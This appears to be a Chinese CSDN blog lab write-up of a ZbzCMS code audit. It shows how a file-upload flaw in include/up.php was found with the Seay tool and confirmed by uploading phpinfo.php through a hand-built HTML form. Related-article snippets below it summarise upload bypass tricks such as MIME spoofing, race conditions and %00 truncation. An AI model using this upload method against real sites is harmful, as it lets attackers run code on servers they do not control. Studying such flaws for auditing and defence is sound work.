代码审计之文件上传漏洞实验

最新推荐文章于 2024-04-18 17:30:00 发布
最新推荐文章于 2024-04-18 17:30:00 发布
阅读量3.4k 收藏 2
点赞数 3
文章标签: 安全 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A1956936030/article/details/121794520
版权

一、phpstudy搭建zbzcms.com网站

在这里插入图片描述

二、使用seay源代码审计工具

1.进行自动审计,发现可疑文件上传的漏洞

在这里插入图片描述

2.双击打开,分析代码,添加变量输出$_FILES在这里插入图片描述

添加代码如下:var_dump($_FILES);

3.在网站根目录下新建html文件内容如下

<html>
<head>
<meta charset="utf-8">
<title>xxx</title>
</head>
<body>

<form action="http://zbzcms:8002/cms/cms/include/up.php?run=file&path=./" method="post" enctype="multipart/form-data">
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>

</body>
</html>

此处改成自己正确的url
在这里插入图片描述

4.用浏览器访问html文件,上传phpinfo.php文件

在这里插入图片描述
返回出路径
在这里插入图片描述

5.访问路径,文件解析成功!

在这里插入图片描述

哇哇**
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
代码审计文件漏洞
willow_liang的博客
11-09 799
1.上漏洞 文件漏洞是指用户上了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力,这种攻击方式是最直接和有效的,文件本身是没问题的,有问题的是文件后,服务器怎么处理,解析文件。通过服务器的处理逻辑做的不够安全,则会导致上漏洞 2.漏洞条件 文件可上 知道文件路径 上文件可以被访问 上文件可以被执行 全局数组$_ _FILES $_ FILES['myFile']['name'] 显示客户端文件的原名称。 $_ FILES['myFile' ]['type']
PHP代码审计基础:文件漏洞
1匹黑马
11-28 449
文章目录漏洞原理危害漏洞条件文件的可控点挖掘思路相关函数move_uploaded_file 漏洞原理 文件漏洞一些web应用程序中允许上图片,文本或者其他资源到指定的位置。 文件漏洞就是利用网页代码中的文件路径变量过滤不严将可执行的文件到一个到服务器中,再通过URL去访问以执行恶意代码。 危害 上漏洞与SQL注入或 XSS相比 , 其风险更大 , 如果 Web应用程序存在上漏洞 , 攻击者上文件是Web脚本语言,服务器的Web容器解释并执行了用户上的脚本,导致代码执行
PHP代码审计 14 文件漏洞
kevinhanser
07-21 566
本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程 PHP 代码审计博客目录 1. 简介 审计函数 move_uploaded_file() 定义和用法: move_uploaded_file() 函数将上文件移动到新位置。 若成功,则返回 true,否则返回 false。 语法: move_uploaded_file...
ZbzCMS 2.1代码审计
2301_80115097的博客
04-18 309
ZbzCMS 2.1代码审计漏洞复现漏洞复现漏洞复现漏洞复现存储型XSS前台任意文件删除前台未授权RCE前台Mysql盲注。
米安代码审计 05 文件漏洞
kevinhanser
07-24 426
本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程 PHP 代码审计博客目录 1. 简介 危害 如果不对被上文件进行限制或者限制被绕过,该功能便有可能会被利用于上可执行文件、脚本到服务器上,进而进一步导致服务器沦陷。 漏洞成因 导致文件漏洞的原因较多,主要包括以下几类 服务器配置不当 开源编辑器上漏洞 本地文件...
PHP 代码审计 (文件)
热门推荐
CSDN
08-03 1万+
这里是条件竞争,先将文件到服务器,然后判断文件后缀是否在白名单里,如果在则重命名,否则删除,因此我们可以上1.php只需要在它删除之前访问即可,可以利用burp的intruder模块不断上,然后我们不断的访问刷新该地址即可。白名单就是允许上某种类型的文件,该方式比较安全,抓包上php后门,然后将文件名改为.jpg即可上成功,但是有时候上后的文件会失效无法拿到Shell.代码中验证了上的MIME类型,绕过方式使用Burp抓包,将上的一句话小马。然后,选择特殊字符,右击。
你不知道的文件漏洞php代码分析
12-18
开发中文件功能很常见,作为开发者,在完成功能的基础上我们一般也要做好安全防护。 文件处理一般包含两项功能,用户上和展示文件,如上头像。 文件攻击示例 upload.php <?php $uploaddir = '...
PHP代码审计音频文件.zip
11-02
任务8:代码审计代码执行漏洞mp4 任务7:PHP代码审计宽字节注入及二次注入mp4 任务6:PHP代码审计SQL注入漏洞mp4 任务5:审计涉及的超全局变量mp4 任务4:代码调试及 Xdebug的配置使用mp4 任务3:PHP核心配置详解mp4...
代码审计Forfity常见扫描 漏洞原理与修复意见介绍
12-22
漏洞原理:任意文件漏洞发生在代码中没有对上文件进行验证和限制,例如没有对文件类型和大小进行限制。 危害介绍:任意文件漏洞可能会导致攻击者上恶意文件,例如恶意脚本、病毒等,从而实施攻击。 ...
php代码审计入坑实践.pdf
07-30
仅拿出几个洞作为例子进行入坑的讲解, 主要是使用 rips 进行辅助审计, 本文是针对小白入坑作为抛砖引玉, 理论的还未进行详细总结, 本来想在最后加上盾灵系统的审计过程。但是觉得 CMS, 不适合刚入门的同学先...
代码审计之youdiancms最新版getshell漏洞1
08-03
代码审计之youdiancms最新版getshell漏洞 本文将对youdiancms最新版getshell漏洞进行代码审计,详细讲解漏洞的发现和利用过程。 SQL注入漏洞 第一步,我们拿到源码,发现该系统是基于THINKPHP3开发的。在App/Lib/...
php代码审计-文件
wulanlin的博客
12-31 196
文件漏洞 在现代的web网站中,文件功是一种常见的功能。比如一些博客网站,允许用户上,图片,视频,头像,等许多其他类型的文件。但是向用户接受的文件越多,所面临的信息安全风险也就越大。如果web网站存在文件漏洞,那么恶意用户就可以利用文件漏洞将可执行上到服务器中,最后获取到网站的权限。 一个漏洞百出的文件代码 <?php $file=$_FILES['tx']; if(is_uploaded_file($file["tmp_name"])) { if(move_u
PHP代码审计文件
小千安全
10-12 342
_FILES$_FILES['uploadFile']['name'] 客户端文件的原名称。$_FILES['uploadFile']['type'] 文件的 MIME 类型,例如"image/gif"。$_FILES['uploadFile']['size'] 已上文件的大小,单位为字节。$_FILES['uploadFile']['tmp_name'] 文件被上后在服务端储存的临时文件名,一般是系统默认。可以在php.ini的upload_tmp_dir指定。
PHP代码审计———14、PHP代码审计文件
Fly_鹏程万里
05-16 454
审计函数move_uploaded_file超全局变量$_FILES后缀名是图片格式前缀名不能是外部提交的上的目录不可以是获取外部提交的路径防御使用白名单方式检测文件后缀上之后按时间能算法生成文件名称上目录脚本文件不可执行注意%00截断...
Web漏洞之——文件漏洞
weixin_64021878的博客
03-31 511
zzcms的文件漏洞,你可以利用这个漏洞,获取你想要的
php代码审计篇二——ZbzCMS
2201_75353421的博客
10-16 192
有段时间没有更新了,这段时间一直在对一些项目重点保护,所以学习有些滞后,但是审代码一直是我比较感兴趣的事,这次也是选择用自己学到的方法结合网上一些已知的漏洞进行审计,希望我的文章也能给想做代审的小伙伴提供思路。
使用zbzcms.com进行代码审计
qq_62673514的博客
01-15 264
使用zbzcms.com进行代码审计
zblogCMS插件-支持各种zblog主题
qq_787143156的博客
01-19 521
zblogCMS插件是指针对zblogCMS网站开发的插件,在已经熟悉了解的zblogCMS的情况下,今天博主就教大家借助免费zblogCMS插件快速提升网站收录以及关键词排名。0基础新手可以直接上手! 1、 网站优化原理 网站优化原理是反馈优质数据给百度等搜索平台,进而提升站点排名,词数和流量,比如提升蜘蛛抓取量,提升网站外链数量,站点等级,优化蜘蛛抓取速度等,进而提升网站关键词排名,首页排名词数以及网站流量。 2、 SEO是什么? SEO意思是搜索引擎优化,通过在搜索引擎上优化关键词,.
文件漏洞防范手段
最新发布
06-06
文件漏洞,也称为“文件包含漏洞”或“upload vulnerability”,通常发生在Web应用程序中,允许攻击者上恶意文件并控制服务器执行这些文件中的代码,可能导致数据泄露、权限提升甚至网站被接管。防范这种漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值